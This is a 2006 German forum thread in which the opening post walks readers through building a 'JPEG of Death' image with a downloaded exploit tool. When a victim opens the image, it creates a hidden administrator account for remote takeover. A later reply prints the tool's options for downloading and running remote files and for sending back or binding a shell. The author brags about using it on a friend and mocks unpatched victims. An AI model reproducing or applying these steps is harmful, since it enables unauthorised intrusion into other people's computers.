JPEG-Exploit (<-- GEIL)

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Marlon, 14. Februar 2006 .

  1. 14. Februar 2006
    Hallo erstamal,
    das hier ist mein 1. Tut/Exploit, also wenn ich n etwas noch nicht ganz perfekt mach, verbessert mich.


    REGELN:
    Regel NR.1 = 10ner !
    Regel NR.2 = Regel NR.1

    Also, kommen wir zu wesentlichen:

    Der Exploit nennt sich "JPEG of DEATH"
    Dieser Exploit erstellt auf dem PC, wo die JPEG angeklickt wird ein Adminaccount mit dem Name : X und dem Passwort : X.
    Das ist gut bzw. sehr gut, weil ihr müsst einfach en Remote-Desktop anlegen und habt einen Adminaccount von dem ihr Name und PW wisst!!!

    So, ihr fragt euch sicherlich wie man den JPEG of Death macht, das sage ich euch jetzt :

    1.Als aller erstes erstellt ihr ein Bild im JPEG format. (Paint)
    ihr speichert das Bild mit dem Name bild.jpg in einen Ordner. (der Name bild kann auch durch ein anderer name ersetzt werden.)

    2. Ihr ladet die Datei runter ( http://rapidshare.de/files/13261910/JpegofDeath.exe.html ).
    (tut das JPEG und die Datei in ein Ordner)
    Diese Datei starte ihr dann per CMD , <--ihr wisst hoffentlich wie das geht, sonst PN an mich.
    Dann kommt da sowas geschriebenes. <-- Interessiert uns net .
    ihr gebt jetzt den Pfad von dem JPEG an und macht ein " -a" dahinter, also so:
    Platte:\Ordner\JpegofDeath.exe -a bild.jpg

    3.Wenn alles glatt gelaufen ist bekommt ihr ne meldung in der steht, das der Exploit erstellt wurde.
    Wenn ihr oder das Opfer jetzt das Bild anklickt erstellt sich ein admin account

    4. Ihr legt eine Remote verbindung an und connectet auf den account,


    10ner net vergessem, und wenn fragem PN an mich ...

    BY MARLON
     
  2. 14. Februar 2006
    äh.. du weist aber schon dass es seit ca 2 JAHREN einen Patch gegen diese Schwachstelle gibt?
     
  3. 14. Februar 2006
    Ja....aber:
    Die dummen sterben nie aus!!!
    es gibt immer idioten, das musst du doch wissen... die schützen sich halt net, sonst gebe es auch kein Netbios hacking....
     
  4. 14. Februar 2006
    hmm is das denn sozusagen wie n trojaner dass ich auf alle ordner und daten auf dem pc zugreifen kann?
     
  5. 14. Februar 2006
    Da ist dein "Trojaner":
    Code:
    * -a: Add User X with Pass X to Admin Group; 
    * IE: Exploit.exe -a pic.jpg 
    * -d: Download a File From an HTTP Server;
    * IE: Exploit.exe -d http://YourWebServer/Patch.exe pic.jpg
    * -r: Send Back a Shell To a Specified IP on a Specific Port;
    * IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg (Default Port is 1337)
    * -b: Bind a Shell on The Exploited Machine On a Specific Port;
    * IE: Exploit.exe -b -p 132 pic.jpg (Default Port is 1337)
    
    Garnicht.
    Das Exploit schreibt Maschienencode (shellcode) in das Bild, welcher durch einen Fehler in der Verarbeitung in den Speicher gelangt und ausgeführt wird.
     
  6. 14. Februar 2006
    hä? jetzt verstehe ich gar nichts mehr. was für eine datei entsteht denn nun? eine .jpeg die eigentlich die eigenschaften einer .exe besitzt?
    und wie lautet der dos befehl um den benutzderaccount zu erstellen
    danke
     
  7. 14. Februar 2006
    Hi,

    der Exploit ist, wie schon oben erwähnt, bekanntlich über 2 Jahre alt.
    Außerdem wird er schon von dem Hauptteil der Virenscannern erkannt bzw. als Exploit identifiziert.

    Und da selbst AntiVir diesen Schritt schon "geschafft" hat, sind die Chancen auf Erfolg ziemlich klein.

    Aber immerhin hast dus gut gemeint


    greetz
     
  8. 14. Februar 2006
    Naja, is halt ne .jpg die nich das macht was sie eigentlich soll...
    Sie hat ne schwachstelle die "unglücklicherweise" einen code weiterschickt.

    GreetZ, ~Br4inP4in~
     
  9. 14. Februar 2006
    verstehe. also ist es keine exe die als jpeg getarnt ist sondern eine jpeg datei deren code verändert wurde.
    wie kann man überhaupt nen code in eine jpeg datei "legen"? würde mich mal interessieren
     
  10. 14. Februar 2006
    wie sollen wir das machen???
    erklähr mal bitte
     
  11. 14. Februar 2006
    xodox hat es ja bereits gesagt..über 2 jahre alt..in zeiten eines SP2 is dieser exploit mehr als sinnlos..kann man closen..
     
  12. 14. Februar 2006
    egal ich will es aber wissen.....
    es gibt leute die wissen nichtmal was SP2 ist...
    also wird es immer nützlich sein
     
  13. 14. Februar 2006
    Ip hast du wahrscheinlich, weil der User von deinem Server die .jpeg gezogen hat. Dann einfach Remote Desktop.

    Oder einfach den Exploit local hernehmen. Also z.b. auf einen Server laden, zu deinem "Freund" gehen, dort die Seite aufrufen, Exploit ausführen und dich dann als Adminstrator X einloggen.

    Mfg,

    Kolazomai
     
  14. 14. Februar 2006
    na gut..denke mr boon meint win remote dektop..was die meisten deaktiviert haben..du gehst auf start->programme->zubehör->kommunikation->remotedektopverbindung.. da gibts die ip vom zielrechner ein (die richtige nich irgendeine vom proxy) user X passwort x..verbinden.. denke kaum das es geht..aba du kansnt ja versuchen wenn nich google halt..
     
  15. 14. Februar 2006
    Könnt ihr mich wenigstens bewerten???????
    WÄre sehr net....


    PS:
    Marvin, ich habe dich geaddet bei ICQ
     
  16. 14. Februar 2006
    öhm bewertungsgeil? oder was.. für was sollen wir dich bewerten..fürn ein 2 jahre altes exploit..omg boon..ich verschwende für bewertungen keine bandbreite. mein armes modem sry ^^ bring was neues dann kannst deien bedeutungslosen "10er" haben ^^

    greets 3psi
     
  17. 14. Februar 2006
     
  18. 14. Februar 2006
    na cih meine, gibts da ein tool für um z.b. dos befehle in ein bild zu schreiben, wenn ja, welches
     
  19. 14. Februar 2006
    Der Exploit erstellt halt einen neuen Adminstrator X mit Passwort X. Das ist halt denk ich ein Bufferoverflow. Is bissl komplizierter. Aber man kann nur bestimmt wenig Code schreiben, dazu müsstest aber erstmal den Exploit verstehen und das tuste wenn du hier so fragst 100% nicht

    ...
     
  20. 15. Februar 2006
    bei 2 versuchen hat es kein einziges mal geklappt , kann jemand von einem erfolg berichten ? die schwachstelle ist schon meiner meinung nach zu gut gefixxt worden.
     
  21. 15. Februar 2006
    Ja, aber viel zu schwierig für dich. Dazu müsstest du erstmal den Source-Code haben und dann verstehen, wie das überhaupt funktioniert alles. Danach wahrscheinlich noch den Befehl als Hex oder was weiss ich was dazuschreiben, aber halt genau so lang, dass es vom Stack Overwriting ( Ich gehe davon aus, dass der Exploit darauf beruht ) noch geht. Also komplizierte Sache.

    Wie vorher die Beiträge schon dauernd sagen, is der Exploit schon etwa 2 Jahre alt und natürlich gibt es kaum noch einen PC, der volnu is. Also Windows SP2 schon gar nicht denk ich mal.

    Mfg,

    Kolazomai
     
  22. 15. Februar 2006
    Bei SP1 gehts!
    Ich habe des JPG meinem Kumpel geschickt und der Admin acc hat sich erstellt...
    <-- DIE DUMMEN STEREBEN NIE AUS!!!!!!
    Ich kenn sogar einen der noch windows 98 drauf hat, und da gings au!


    Könnte ich PLS ne Bewertung haben, weil meine so schlecht is, sonst hätte ich diesen exploit mir net aus den fingern gesogen.
    Und nochwas, das Exploits gefixed werden is keine neuigkeit,man musss halt nur die richtigen
    Leute/Idioten kennen und alles klappt perfekt, und glaubt mir, es gibt mehr Idioten wie ihr denkt!!
     
  23. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.